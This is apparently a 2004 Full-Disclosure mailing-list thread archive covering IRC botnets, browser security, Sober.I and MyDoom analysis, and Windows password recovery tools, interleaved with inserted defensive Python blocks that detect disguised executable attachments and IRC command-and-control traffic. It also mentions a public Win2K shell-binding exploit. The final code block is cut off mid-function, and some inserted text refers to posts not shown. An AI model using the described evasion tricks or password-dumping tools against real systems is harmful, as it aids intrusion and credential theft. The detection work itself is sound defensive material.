> how bout because it is entertaining and it is an easy way to communicate with a large group of ppl at once

So that trumps its infestation of illegal activities?

...D
Re: [Full-Disclosure] Why is IRC still around?
On Fri, 19 Nov 2004 14:55:12 -0500, Keith Pachulski [EMAIL PROTECTED] wrote:
> been on yahoo lately? or AOL channels or hell how bout gnutella?

Do they organize zombies, foster the creation of backdoors, round up DoS attacks? Sure, getting rid of the big piracy rings would be nice, but I am focusing on the malware, zombies, bots, organized DoS attacks, etc. aspect of IRC.

...D
[Full-Disclosure] Why is IRC still around?
Well, it sure does help the anti-virus (anti-malware) and security consulting business, but besides that... is it not safe to say that:

1) A hell of a lot of viruses/worms/trojans use IRC to wreak further havoc?
2) A considerable amount of script kiddies originate and grow through IRC?
3) A wee bit of software piracy occurs?
4) That many organized DoS attacks through PC zombies are initiated through IRC?
5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs?

The list goes on and on...

Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place?

...D
Re: [Full-Disclosure] Sober.I worm is here
On Fri, 19 Nov 2004 11:22:31 -0500, KF_lists [EMAIL PROTECTED] wrote:
> can you define medium sized epidemic? Any new features / functionality?

Not too much, except for the fact that it also arrives with the following attachment extensions: .doc, .txt, and .word

Which are not typically blocked by layer 7 aware firewalls. Whereas, the biggies .scr, .pif, .exe, .com, .bat, etc., are usually blocked.

...D
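An added example for the two Sober.I replies above (the ".txt file" question earlier in the page and the attachment-extension list here), not code from either post. It shows what a filter that only looks at the visible extension misses: Explorer's default "hide extensions for known file types" displays readme.txt.pif as readme.txt, a run of spaces pushes the real extension out of view in a mail client, and a name ending in .doc or .txt says nothing about the bytes inside. The extension lists in the block are representative rather than exhaustive, the Verdict type is this example's own, and every sample name and byte string is constructed.

```python
"""Attachment checks that do not trust the visible extension.

Added example for the Sober.I thread, not code from any post in it.  Checks
every extension in the name, what the user will actually be shown, and the
content's leading bytes.  Sample names and bytes are constructed.
"""
import re
from typing import List, NamedTuple

EXECUTABLE_EXTS = {"exe", "com", "bat", "cmd", "pif", "scr", "vbs", "vbe", "js",
                   "jse", "wsf", "wsh", "hta", "cpl", "lnk", "reg"}
# Extensions Explorer hides under the default "Hide extensions for known file
# types" setting (a representative subset; the real list is every registered type)
HIDDEN_BY_EXPLORER = EXECUTABLE_EXTS | {"txt", "doc", "xls", "zip", "jpg", "gif", "htm", "html"}
CONTENT_MAGIC = [
    (b"MZ", "pe-executable"),
    (b"PK\x03\x04", "zip-archive"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole-compound-document"),   # .doc/.xls
]


class Verdict(NamedTuple):
    filename: str
    displayed_as: str        # what Explorer shows with known extensions hidden
    extensions: List[str]    # every extension in the name, left to right
    content_type: str
    block: bool
    reasons: List[str]


def extensions_of(name: str) -> List[str]:
    return [p.strip().lower() for p in name.split(".")[1:]]


def explorer_display_name(name: str) -> str:
    """Strip only the final extension, and only if Explorer would hide it."""
    exts = extensions_of(name)
    if exts and exts[-1] in HIDDEN_BY_EXPLORER:
        return name[: name.rfind(".")]
    return name


def sniff_content(head: bytes) -> str:
    for magic, ctype in CONTENT_MAGIC:
        if head.startswith(magic):
            return ctype
    return "other"


def check_attachment(name: str, head: bytes) -> Verdict:
    exts = extensions_of(name)
    shown = explorer_display_name(name)
    ctype = sniff_content(head)
    reasons = []
    if exts and exts[-1] in EXECUTABLE_EXTS:
        reasons.append(f"executable extension .{exts[-1]}")
        if len(exts) > 1:
            reasons.append(f"double extension: user sees {shown!r}")
    if re.search(r"\s{3,}\.", name):
        reasons.append("whitespace padding pushes the real extension out of view")
    if ctype == "pe-executable" and (not exts or exts[-1] not in EXECUTABLE_EXTS):
        # the case a name-only filter lets through: harmless name, MZ header inside
        reasons.append(f"content is a PE executable but name claims .{exts[-1] if exts else '(none)'}")
    return Verdict(name, shown, exts, ctype, bool(reasons), reasons)


# --- constructed samples (names and bytes are made up for the example) -------
SAMPLES = [
    ("readme.txt", b"Hello from the sample.\r\n"),
    ("readme.txt.pif", b"MZ\x90\x00\x03\x00\x00\x00"),
    ("invoice.doc", b"MZ\x90\x00\x03\x00\x00\x00"),
    ("report.doc", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00\x00"),
    ("photo.jpg                                .scr", b"MZ\x90\x00"),
]


def check_samples() -> List[Verdict]:
    return [check_attachment(n, h) for n, h in SAMPLES]


if __name__ == "__main__":
    for v in check_samples():
        print("BLOCK" if v.block else "pass ", repr(v.filename), "shown as", repr(v.displayed_as),
              v.content_type, "; ".join(v.reasons))
```

The content check is the one that matters for the case in this thread: "invoice.doc" with an MZ header is blocked even though .doc is nowhere on the blocked-extension list. The same applies inside archives, which this block does not open; a filter that sniffs only the outer file passes a .zip whose member is readme.txt.pif.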
Re: [Full-Disclosure] Why is IRC still around?
On Fri, 19 Nov 2004 12:17:09 -0800, Mister Coffee [EMAIL PROTECTED] wrote:
> Danny wrote:
>> Well, it sure does help the anti-virus (anti-malware) and security consulting business, but besides that... is it not safe to say that:
>> 1) A hell of a lot of viruses/worms/trojans use IRC to wreak further havoc?
>
> And? There are a hell of a lot of normal users on IRC too who don't wreak havoc. A lot of spam comes in email. Does that make email bad?
>
>> 2) A considerable amount of script kiddies originate and grow through IRC?
>
> And AIM, ICQ, Jabber, web-forums, mailing lists, etc. IRC is one medium amongst many.
>
>> 3) A wee bit of software piracy occurs?
>
> Some, perhaps. But unlike, say BitTorrent or Kazaa, IRC's primary role is communication rather than file transfer. You could make the same argument for ANY of the IM clients that support file transfer.
>
>> 4) That many organized DoS attacks through PC zombies are initiated through IRC?
>
> Many do. Yes. But many also originate through other media, and, again, it's not the medium's fault that people use it for nefarious purposes. Hitmen get calls on their cell phones. Should we eliminate cell phones to stop the hitmen?
>
>> 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs? The list goes on and on...
>
> Anonymity is not a bad thing in many, many respects. And the list of legitimate uses goes on and on as well.
>
>> Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC?
>
> No offense. But the arguments aren't especially strong. We're not pushing to sunset the IRC protocol because there are still thousands and thousands of -legitimate- users in the world. Unlike most IM systems, the IRC nets are completely independent. There are some serious advantages to that.
>
>> What would IT be like today without IRC (or the like)? Am I narrow minded to say that it would be a much safer place?
>
> Yes? IRC is a protocol. A tool like any other. Last I looked there were still hundreds to thousands of IRC users at any given time who were there just to hang out and BS with their friends. It's still a valid community if you will, in spite of the nefarious uses other people have put it to. If you sunset something like IRC, the 3v1L [EMAIL PROTECTED] will just move their bots and trojans somewhere else.

Well said. Thanks for your time.

...D
Re: [Full-Disclosure] Why is IRC still around? (Because anything less would be uncivilized)
Well, fellow F-D'ers, thanks to the vast array of intelligence and experience found on this list, my rant about abolishing IRC has been proven to be far from a solution.

Maybe I will throw my suggestion in as a Feature Request for Internet2. :D

...D
Re: [Full-Disclosure] Why is IRC still around?
On Fri, 19 Nov 2004 14:47:36 -0600, Bowes, Ronald (EST) [EMAIL PROTECTED] wrote:
> How exactly do you propose to accomplish this? IRC is an open protocol and there are many open clients and open servers which can run on any port, and run encrypted with SSL. So do you intend to scan every computer on the Internet on port 6667, and shut down every server found running, then move on to random ports that zombies probably use, and start attacking sites that provide open source clients that use an open protocol? Your suggestion makes no sense, and it's something that's impossible to implement.
>
> Why not just make knives illegal? I mean, they're frequently used as a weapon, right?

Yah, you are right. I just needed to rant when I see all these trojans written to call home (to an IRC channel) and DoS attacks coordinated via IRC to control unpatched anti-virus-less Windows PC zombies.

Next topic...

...D
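An added example, not code from any post in the thread, of the point made in this reply and in bkfsec's earlier one: IRC servers run on any port, so scanning for 6667 finds little, while the unencrypted protocol itself is what makes bot traffic trackable. The block classifies captured flows by recognising the RFC 1459 message grammar and the NICK/USER registration in the payload regardless of port, and reports nick, channels and whether the port is one where IRC is conventionally expected. The SSL-wrapped flow shows where a content check stops working. The Flow type, the port list and all flows, nicks and channel names are this example's own constructions.

```python
"""Port-independent IRC detection from payload content.

Added example for the thread above, not code from any post in it.  IRC is a
plain-text protocol that runs on any port; the NICK/USER registration, JOIN,
PRIVMSG and the server's numeric replies are easy to recognise in captured
payloads, port or no port, as long as the session is not wrapped in SSL.
All flows below are constructed; nicks and channels are made up.
"""
import re
from typing import List, NamedTuple, Optional, Tuple

# <message> ::= [':' <prefix> <SPACE>] <command> <params>   (RFC 1459, 2.3.1)
IRC_LINE_RE = re.compile(
    r"^(?::(?P<prefix>\S+)\s+)?"
    r"(?P<cmd>[A-Za-z]+|\d{3})"
    r"(?P<params>(?:\s+[^:\s]\S*)*)"
    r"(?:\s+:(?P<trailing>.*))?\s*$")
COMMANDS = {"PASS", "NICK", "USER", "JOIN", "PART", "PRIVMSG", "NOTICE", "MODE",
            "TOPIC", "PING", "PONG", "QUIT", "KICK", "WHO", "NAMES", "OPER"}
CONVENTIONAL_PORTS = set(range(6660, 6670)) | {194, 7000}   # where IRC is *expected*


class Flow(NamedTuple):
    client: str
    server: str
    port: int
    client_data: bytes      # reassembled client -> server payload
    server_data: bytes      # reassembled server -> client payload


class IrcSession(NamedTuple):
    flow: str
    port: int
    nonstandard_port: bool
    nick: Optional[str]
    channels: List[str]
    server_seen: bool       # the server side answered in IRC too


def parse_line(line: str) -> Optional[Tuple[Optional[str], str, List[str]]]:
    """(prefix, COMMAND, params) for an IRC-shaped line, else None."""
    m = IRC_LINE_RE.match(line.strip())
    if not m:
        return None
    cmd = m.group("cmd").upper()
    if not (cmd.isdigit() or cmd in COMMANDS):
        return None      # "GET / HTTP/1.1" has the shape but not the vocabulary
    params = m.group("params").split()
    if m.group("trailing") is not None:
        params.append(m.group("trailing"))
    return m.group("prefix"), cmd, params


def irc_lines(data: bytes):
    # latin-1 never fails, so a binary payload (a TLS handshake, say) simply
    # yields lines that do not parse instead of raising
    for line in data.decode("latin-1").split("\r\n"):
        parsed = parse_line(line)
        if parsed:
            yield parsed


def classify_flow(flow: Flow) -> Optional[IrcSession]:
    """Decide from the payload, not the port number, whether this flow is IRC."""
    nick, channels, seen = None, [], set()
    for _, cmd, params in irc_lines(flow.client_data):
        seen.add(cmd)
        if cmd == "NICK" and params:
            nick = params[0]
        elif cmd == "JOIN" and params:
            channels += [c for c in params[0].split(",") if c.startswith(("#", "&"))]
    server_seen = any(cmd.isdigit() or cmd in ("PING", "PRIVMSG", "NOTICE")
                      for _, cmd, _ in irc_lines(flow.server_data))
    # the bar is a NICK+USER registration or a server that answers in IRC;
    # one word that happens to be a command name is not enough
    if not ({"NICK", "USER"} <= seen or server_seen):
        return None
    return IrcSession(f"{flow.client}->{flow.server}:{flow.port}", flow.port,
                      flow.port not in CONVENTIONAL_PORTS, nick, channels, server_seen)


# --- constructed sample flows --------------------------------------------------
SAMPLE_FLOWS = [
    Flow("10.0.0.5", "203.0.113.10", 6667,        # a person chatting, standard port
         b"NICK danny\r\nUSER danny 0 * :Danny\r\nJOIN #security\r\n"
         b"PRIVMSG #security :anyone seen the new sober variant?\r\n",
         b":irc.example.net 001 danny :Welcome to the network\r\nPING :irc.example.net\r\n"),
    Flow("10.0.0.77", "198.51.100.23", 1863,      # a bot on a port chosen to look like MSN
         b"PASS hunter2\r\nNICK zq-4471\r\nUSER a b c :d\r\nJOIN #c0ntrol chankey\r\n",
         b":198.51.100.23 001 zq-4471 :hi\r\n:ops!o@x MODE #c0ntrol +k chankey\r\n"),
    Flow("10.0.0.9", "192.0.2.44", 6667,          # plain HTTP that happens to use 6667
         b"GET / HTTP/1.1\r\nHost: 192.0.2.44\r\n\r\n",
         b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"),
    Flow("10.0.0.12", "192.0.2.80", 9999,         # SSL-wrapped: nothing for a content check to see
         b"\x16\x03\x01\x00\x8d\x01\x00\x00\x89\x03\x01",
         b"\x16\x03\x01\x00\x4a\x02\x00\x00\x46\x03\x01"),
]


def classify_samples() -> List[IrcSession]:
    return [s for s in map(classify_flow, SAMPLE_FLOWS) if s is not None]


if __name__ == "__main__":
    for s in classify_samples():
        print(s.flow, "nick=%s channels=%s nonstandard_port=%s" % (s.nick, s.channels, s.nonstandard_port))
```

Feeding this from a capture means reassembling each TCP stream first (a pcap reader or the sniffer's "follow stream" output); the block starts from the reassembled bytes. The fourth flow is the limit Ron Bowes points at: once the session is under SSL, only endpoints, timing and volume are left to work with.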
Re: [Full-Disclosure] Why is IRC still around?
On Fri, 19 Nov 2004 15:54:54 -0500, Tim [EMAIL PROTECTED] wrote: 1) A hell of a lot of viruses/worms/trojans use IRC to wreak further havoc? Isn't email the primary spreading mechanism of viruses? My mistake; I was referring to the discussion, collaboration, and creation, not the spread. Should we sunset email? Some say we should, but I am not one of those. My point was to get rid of the most well established tool (and easiest to use) for these types of activities. 2) A considerable amount of script kiddies originate and grow through IRC? And if there were no IRC, they would use AIM, or MSN messenger, or more likely, jabber. What's the difference? It is popular amongst hackers (of any level of morality) because it is open. What's the difference? IRC is so well established for the type of activity I am referring to. 3) A wee bit of software piracy occurs? And it doesn't on any other protocol? People who want to pirate will do it using whatever tools are available. Take away one, and others will be used. I'll leave the piracy battle for someone else - I just mentioned it as a part of the problem. 4) That many organized DoS attacks through PC zombies are initiated through IRC? It wouldn't be any harder to pull this off via netcat. If it is the anonymity an attacker wants, they just use one of the zombies as the server. Sure netcat is an alternative, but which one is easier to use? 5) The anonymity of the whole thing helps to foster all the illegal and malicious activity that occurs? How is it any more anonymous than email, or web, or any other unauthenticated protocol? My point was to get rid of the most well established tool (and easiest to use) for these types of activities. You obviously can't get rid of them all. Please don't tell me you trust the From: header in your email, or believe that all of the IPs in your weblogs are directly tied to a person's home PC. And all these years frig! The list goes on and on... 
Yes, but every one of those arguments is horribly flawed. I am not sure if you are just being a troll or what. I thought I would throw out the idea. If you want to call me a troll, then so be it, but don't get your panties in a knot over the whole thing. Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? Am I narrow-minded to say that it would be a much safer place? Yes, you are being narrow-minded. Fair enough. ...D
Re: [Full-Disclosure] controversial shadowcrew site hacked by secret service?
On Wed, 17 Nov 2004 04:23:52 -0600, Curt Purdy [EMAIL PROTECTED] wrote: Danny wrote: The Secret Service, or any other government enforcement agency would not condone, promote, or participate in website defacement activities. I know some of you have little faith in these agencies, but, one thing is for sure, they would never stoop this low. Insecure replied: Even when the Secret Service admits that they took over the site and put up their own page, you don't believe it? Must be nice to have such blind faith in the integrity of your government enforcement agencies. Duh... I don't know whether it's you folks who doomed us to another 4 years of hell trying to justify your own blind faith or what, but it's time you all woke up to reality. Good Morning America! Our government is no more ethical than any other country's. Whether it is our agents murdering a South American dictator we don't happen to like, or our agents defacing a cracker's site, it happens. Obviously you slept through the weeks of cyberwar our (paid) hackers fought with China's (paid) hackers after they downed our jet a while back. It was China who finally called a truce in their official press. Sorry to give you people the bad news, but Bambi died a while ago. It's the wild west in 1800 and there is no law. If you want to survive, you better have a hired gun and we go for $300/hour these days. At least those of us who have met the black hat on main street at 50 paces at high noon and walked away to tell about it. 1) I am not a US citizen, nor do I live in a US state, and quite frankly, I would be scared to live in a country under the control of George W. Bush. 2) Yes, it was difficult to tell that I was kidding, but notice the end of my email ...D is also a big smile. 3) I can count to three. Yippeee ...D
Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
On Tue, 16 Nov 2004 09:07:56 -0600, Todd Towles [EMAIL PROTECTED] wrote: Darwin and BSD...Darwin is the open source kernel that OS X uses...=) What does this have to do with IE and Firefox, again? ...D
Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
On Tue, 16 Nov 2004 10:33:26 -0600, Todd Towles [EMAIL PROTECTED] wrote: It doesn't. I was responding to another off-topic message. But then again, how many messages on FD stay on topic for more than 10 messages. =) Fair enough. Who do you think posted the original IE is just as safe as FireFox message? ;) I am too lazy to. So what did your message add to the subject? Other than telling me it was OT..which is given. Hopefully an end or a start of a new thread. :) This will be my last OT post on this subject. ...D
Re: [Full-Disclosure] controversial shadowcrew site hacked by secret service?
On Tue, 16 Nov 2004 16:58:46 +, n3td3v [EMAIL PROTECTED] wrote: The site which was hosting services, like bombs, fake ID and other terrorist stuff is now showing a defacement or replacement page showing words from the intelligence services. http://www.shadowcrew.com Is this fake or real? Who knows.. The Secret Service, or any other government enforcement agency would not condone, promote, or participate in website defacement activities. I know some of you have little faith in these agencies, but, one thing is for sure, they would never stoop this low. ...D
Re: [Full-Disclosure] IE is just as safe as FireFox
On Thu, 11 Nov 2004 20:27:52 -0500, Scott Leff [EMAIL PROTECTED] wrote: On Thu, 11 Nov 2004 19:18:55 -0500, Danny [EMAIL PROTECTED] wrote: Yes, IE security needs work. Yes, Firefox is a great web browser. However, if Firefox or any other browser had the same market share as IE, would it really be that much more secure? There sure would be a lot more people trying to find holes in Firefox if it had the same user base. ...D This is applicable here: http://www.io.com/~cwagner/spyware/appendix.html Although it deals with malware/spyware, it highlights the major problem with IE that other 3rd party browsers do not have and will never have; namely, its marriage to the OS. Fair enough. The other problem is Microsoft's focus is on features first, then maybe a wee bit of security way down the list. ...D
Re: [Full-Disclosure] IE is just as safe as FireFox
On Fri, 12 Nov 2004 01:50:45 -0500, David B Harris [EMAIL PROTECTED] wrote: On Thu, 11 Nov 2004 19:18:55 -0500 Danny [EMAIL PROTECTED] wrote: Yes, IE security needs work. Yes, Firefox is a great web browser. However, if Firefox or any other browser had the same market share as IE, would it really be that much more secure? There sure would be a lot more people trying to find holes in Firefox if it had the same user base. ... because as soon as you hit 50% marketshare, the quality of the code which has been written and distributed instantaneously and magically drops an order of magnitude ... /sarcasm It's a simple concept. The more people use something, the more flaws are exposed. Especially if there ARE more flaws, lol. IE is doomed because of its integration with Microsoft software and its feature set. (See my last post for more info). ...D
Re: [Full-Disclosure] IE is just as safe as FireFox
On Thu, 11 Nov 2004 21:22:26 -0600, Frank Knobbe [EMAIL PROTECTED] wrote: On Thu, 2004-11-11 at 18:18, Danny wrote: However, if Firefox or any other browser had the same market share as IE, would it really be that much more secure? Wrong question. It's part of the equation. May not be the biggest part, but it is a factor. Based on everyone's feedback, I would say the following kills IE's security:
1) Features
2) Features
3) ActiveX / Active Scripting
4) Its marriage with the OS
5) Its market share
6) Its marriage with so many other MS applications
Yes, from a security point of view, this is very bad. Fundamentally, Microsoft is in trouble with IE and security. Who the hell would be able to secure a web browser with so much integration and features? The only hope in hell anyone would have securing IE is by removing the crap list above. ...D
Re: [Full-Disclosure] IE is just as safe as FireFox
On Fri, 12 Nov 2004 22:15:31 +0100, nicolas vigier [EMAIL PROTECTED] wrote: On Thu, 11 Nov 2004, Danny wrote: Yes, IE security needs work. Yes, Firefox is a great web browser. However, if Firefox or any other browser had the same market share as IE, would it really be that much more secure? There sure would be a lot more people trying to find holes in Firefox if it had the same user base. Yes, IIS security needs work. Yes, Apache is a great web server. A properly setup IIS 6.0 server is no less secure than a properly setup Apache server (with the latest patches). Show me how/where a properly setup IIS 6.0 server needs security work? If you can't hack it, find someone who can or has, and show me evidence that it was setup properly. When I say properly, I mean, based on the recommendations stated on Microsoft's website for securing IIS 6.0. Likewise for setting up Apache. However, if Apache or any other web server had the same market share as IIS, would it really be that much more secure? There sure would be a lot more people trying to find holes in Apache if it had the same user base. I didn't ask for a comparison for web SERVERS. We are talking about clients; we are talking about Internet Exploiter and any other web browser with more than 1000 users, say for example Firefox. Wooops. Netcraft tells us that 67% of webservers are running Apache while 21% are running IIS. Why are there so many worms targeting IIS and not so many for Apache? 1) Because Microsoft did not have any useful security in mind when they put out IIS 4 and 5. IIS 6 is a much different story; http://secunia.com/product/1438/ 2) I would say over 3/4 of them were not setup properly. You know, if you want your Microsoft product on the Internet, you do, unfortunately, have to set it up properly. However, it's actually not a lot of work. The problem is, most people don't do the work. They just plug it into the network and say Alright, we gots our fackin' websiiite up dare boys. 
Cletus, upload that fantiastic websiite with you shaggin' your mom's sisters goat that you made dare in FrontPage. Rght on little buddy! Shes alive! 3) Most MS admins are lazy and know very little about security. It's catch 23... why bother securing a product that does not have security built-in. The truth is that some programs have a bad design for security while some others have a better one. I agree. Microsoft is obviously the worst for this. See my last few posts. Believe it or not, I prefer Firefox over IE, Apache over IIS, FreeBSD over Windows, etc. The difference is, I have an open mind and try to keep all aspects of the debate in mind. ...D
Re: [Full-Disclosure] IE is just as safe as FireFox
On Thu, 11 Nov 2004 15:59:20 -0600, Todd Towles [EMAIL PROTECTED] wrote: Microsoft's security and management product manager (Ben English) says... At a security roundtable discussion in Sydney on Thursday, Ben English, Microsoft's security and management product manager, told attendees that IE undergoes rigorous code reviews and is no less secure than any other browser. Because IE is ubiquitous, you hear a lot more about it, but I don't think that Internet Explorer is any less secure than any other browser out there, English said. http://news.com.com/Microsoft+says+Firefox+not+a+threat+to+IE/2100-1032_3-5448719.html?part=dhttag=ntoptag=nl.e433 Can anyone say IFRAME? Lol Yes, IE security needs work. Yes, Firefox is a great web browser. However, if Firefox or any other browser had the same market share as IE, would it really be that much more secure? There sure would be a lot more people trying to find holes in Firefox if it had the same user base. ...D
Re: [Full-Disclosure] New MyDoom exploiting IFRAME
On Wed, 10 Nov 2004 00:45:12 +1300, Nick FitzGerald [EMAIL PROTECTED] wrote: Berend-Jan Wever wrote: There's a new MyDoom variant exploiting the IFRAME issue ... In fact, it seems there's a reasonable chance many (most?) AV vendors will actually (re-)name this Bofra as it is sufficiently different from Mydoom as to seem worthy of a new family name. There are three known variants already. Note today's entry here: http://www.f-secure.com/weblog/ ...D
Re: [Full-Disclosure] How to clear contents of protected storage - Windows 2000
On Wed, 3 Nov 2004 11:32:40 +0300, 3APA3A [EMAIL PROTECTED] wrote: Dear Danny, You can use Cain & Abel (http://www.oxid.it). Hi 3APA3A, Thank you for the tip. For this particular job, it does not display all of the entries listed from pstoreview.exe, specifically the INETCOMM Server passwords. Anything else I can try? ...D
Re: [Full-Disclosure] How to clear contents of protected storage - Windows 2000
On Wed, 3 Nov 2004 09:56:31 -0500, Danny [EMAIL PROTECTED] wrote: On Wed, 3 Nov 2004 11:32:40 +0300, 3APA3A [EMAIL PROTECTED] wrote: Dear Danny, You can use Cain & Abel (http://www.oxid.it). Hi 3APA3A, Thank you for the tip. For this particular job, it does not display all of the entries listed from pstoreview.exe, specifically the INETCOMM Server passwords. Anything else I can try? I found passview from nirsoft. Works. Case closed. ..D
[Full-Disclosure] How to clear contents of protected storage - Windows 2000
After running: http://ntsecurity.nu/toolbox/pstoreview/ ...there are a bunch of INETCOMM Server passwords I want to clear out. Any idea on how to complete this? Thank you, ...D
Re: [Full-Disclosure] Windows 2000 Remote Buffer Overflow by class101
On Fri, 22 Oct 2004 13:20:36 -0500, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Posted here: http://dfind.kd-team.com/36/55/op.php Stack based overflow, bug discovered by Luigi Auriemma aluigi.altervista.org Tested working on Win2K. This public version crashes on any WinXP; read the code to see why. The exploit binds a shellcode on the victim port 101. What does Microsoft say in response? ...D
Re: [Full-Disclosure] Undetectable Virus from CANADA ISP 69.197.83.68
On Fri Oct 22 22:28:50 2004, Farrukh Hussain [EMAIL PROTECTED] wrote: Hi, Today I got e-mail from 69.197.83.68 CANADA ISP You mean a Canadian ISP? which has undetectable virus. By all anti-virus vendors? Well I downloaded this file but I didn't run it because I know it is virus. If you say it was not detected as a virus, how do you know it is a virus? and now I am complaining to rogers.com ISP about this matter. Because I got this file from this ISP. It is abuse of internet service. Welcome to the Internet. Unprotected computers are connected to ISPs across the globe. We receive hundreds of viruses from computers connected to ISPs every week. If you gave their abuse department the full email headers of this email you received from 69.197.83.68, then they will investigate and deal with the matter. However, no ISP can force all of their users to run a personal firewall, up-to-date AV, and install the latest OS patches -- although they can encourage it and educate users on these subjects - which Rogers does do. I wish you well, ...D
Re: [Full-Disclosure] Senior M$ member says stop using passwords completely!
On Thu, 21 Oct 2004 23:52:18 +0300, Georgi Guninski [EMAIL PROTECTED] wrote: due to Tiny-delicate windows implementation, current windows passwords don't seem long enough (a m$ guy confirmed it). i recommend windows passwords to be enlarged by 3 to 5 inches. 100% guaranteed! (if permitted by the EULA) Password girth or length? ...D
Re: [Full-Disclosure] Senior M$ member says stop using passwords completely!
On Wed, 20 Oct 2004 17:01:56 +0300, Georgi Guninski [EMAIL PROTECTED] wrote: the poor m$ guy updated his blog. looks like he uses Excel(tm) for solving crypto problems. [...] Georgi, passwords vs. passphrases, which do you recommend? ...D
Re: [Full-Disclosure] interesting trojan found
On Wed, 20 Oct 2004 17:51:26 +0100, Richard Stevens [EMAIL PROTECTED] wrote: b: anyone know a free boot disk that both reads and writes to NTFS, so I can delete it! If you have a CD-ROM, http://www.nu2.nu/pebuilder/. ...D
Re: [Full-Disclosure] Microsoft Security Bulletin Summary for October, 2004
On Tue, 12 Oct 2004 14:43:44 -0400, d31337 [EMAIL PROTECTED] wrote: Interesting that XP SP2 doesn't seem to be impacted by any of these vulnerabilities. Kinda gives you the impression MS knew about these for some time... http://www.microsoft.com/technet/security/bulletin/ms04-oct.mspx Not according to the security bulletins I read: http://www.microsoft.com/technet/security/bulletin/MS04-038.mspx Affected Software: Microsoft Windows NT Server 4.0 Service Pack 6a Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6 Microsoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4 Microsoft Windows XP, Microsoft Windows XP Service Pack 1, and Microsoft Windows XP Service Pack 2 ...D
Re: [Full-Disclosure] Microsoft Security Bulletin Summary for October, 2004
On Tue, 12 Oct 2004 19:27:42 -0400, d31337 [EMAIL PROTECTED] wrote: I should have been more specific to eliminate confusion for those who consider IE part of the OS. Revised comment: Interesting that XP SP2 doesn't seem to be impacted by any of the *Windows* (not IE) vulnerabilities... I see your point, however, I would say IE is more a part of Windows than any other component. Now, back to your theme, yes, I also agree that Windows XP SP2 was less affected by these vulns than any other version of Windows. I would like to tell Microsoft, this is the way it *should* be! ...D
[Full-Disclosure] mydoom.exe decyphering?
layman Sophos says: (sync-1.01; andy; I'm just doing my job, nothing personal, sorry) OK, this can readily be deduced somewhat from the mydoom.exe but not entirely. Ironically aladdin systems can find itself back in the worm's 'strings' output... a part of it is compressed with stuffit. [download MyDoomB, cut out the StuffIt part, unstuff it and cut out the (3rd/last) data part (use tail or so). Then hexdump -C that one again] Here's the part with the text (use fixed font in your mail client): HEX ff 87 22 92 00 0a 0a 28 73 79 6e 63 2d 31 2e fd ASCII * * 32 * 0 10 10 40 115 121 110 99 45 49 46 * SYMBOL * * * * * * ( s y n c - 1 . * HEX ff 6f ff 30 31 3b 20 61 6e 64 79 5 49 27 6d 20 ASCII * 111 * 48 49 59 32 97 110 100 121 5 73 39 109 32 SYMBOL * o * 0 1 ; a n d y * I ' m HEX 6a 75 73 74 20 64 6f 69 6e 67 20 6d 79 6b ff ef ASCII 106 117 115 116 32 100 111 105 110 103 32 109 121 107 * * SYMBOL j u s t d o i n g m y k * * HEX bf 0d 6f 62 2c 20 6e 6f 74 68 0f 70 65 72 73 6f ASCII * 13 111 98 44 32 110 111 116 104 15 112 101 114 115 111 SYMBOL * * o b , n o t h * p e r s o HEX 6e 61 6c 11 06 a6 fb ae 7d 72 72 79 29 42 47 40 ASCII 110 97 108 17 6 * * * 125 114 114 121 41 66 71 64 SYMBOL n a l * * * * * } r r y ) B G @ So: (sync-1...o.01; andy.I'm just doing mykob, noth.personal.}rry) A few observations: - 'noth*' seems to get its 'ing ' part from the token 'doing ' - likewise ' just' must be the inspiration for ' job' replacing the ' j' with 'k' where * are non ascii. Note that ' just' fits into '' and j=k-1 - '*}rry' should translate to ' sorry' or (sophos) ', sorry' - is it sync-1.01 or perhaps sync-1.1.p01 or so, does anyone have any idea what this sync is anyway - if BG@ at the end could in some way end up being 'BEGIN' we have an uuencoded remainder which would have to be 'decrypted' first. 
- how did sophos fill in the blanks, or did they One would think the entire data chunk would be encrypted or encoded or whatever you want to call it in the same manner (something like uuenc/decode can be used to have binary data be changed and obfuscated as text and restored to binary through a 1 on 1 (de)obfuscation, right?). Any thoughts? Is this a known algorithm that I'm not aware of for unicode compressing or something alike? How do other people investigate a binary? (I look at hexdumps, strings, output of 'file', magic numbers/strings...) Let me dare say something I'm going to regret (heck this list is full of flamethrowers anyway ;-) To be honest, I have an unpleasant feeling that this whole thing might be staged. It's so suggestive. But I lack the skill to look further and don't passionately care enough either. Yet, this is one interesting thing with the whole MS and SCO background. Please note, I use FreeBSD exclusively, not Windows, but was bored and got interested, and I'm wondering if anyone has done any research or experimenting on this. I've looked at them on my FreeBSD desktop box. I'm not familiar with Windows code other than looking at some worm and noticing that it has smtp code or so. The things with archives within executables holding executables and even with a Mac archiving package being used, uhhmm I'll pass on that and just assume that that's all normal and doable out there over the fence :) /layman Hope you don't blame me for trying to have some interesting discussion. No matter what your skill level, it sure beats the ever present pissing contests. Regards, --Dan (normally lurker with habitual attraction to DEL key)
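The three-row HEX / ASCII / SYMBOL dump the post above lays out by hand, plus the `strings`-style scan the poster mentions, as an added example (not the poster's tooling). The sample input is constructed from the first 32 bytes quoted in the post; bytes at or above 0x80 are shown as '*' in the decimal row, and anything non-printable as '*' in the symbol row.

```python
"""Render bytes in the HEX / ASCII(decimal) / SYMBOL layout used in the post
above and pull out printable runs the way `strings` does. Added example."""


def triple_dump(data: bytes, width: int = 16) -> list:
    """Return (offset, hex_row, ascii_row, symbol_row) tuples, `width` bytes per row.

    ascii_row: decimal code for 7-bit bytes, '*' for bytes >= 0x80.
    symbol_row: the printable character for 0x20..0x7e, '*' otherwise.
    """
    rows = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
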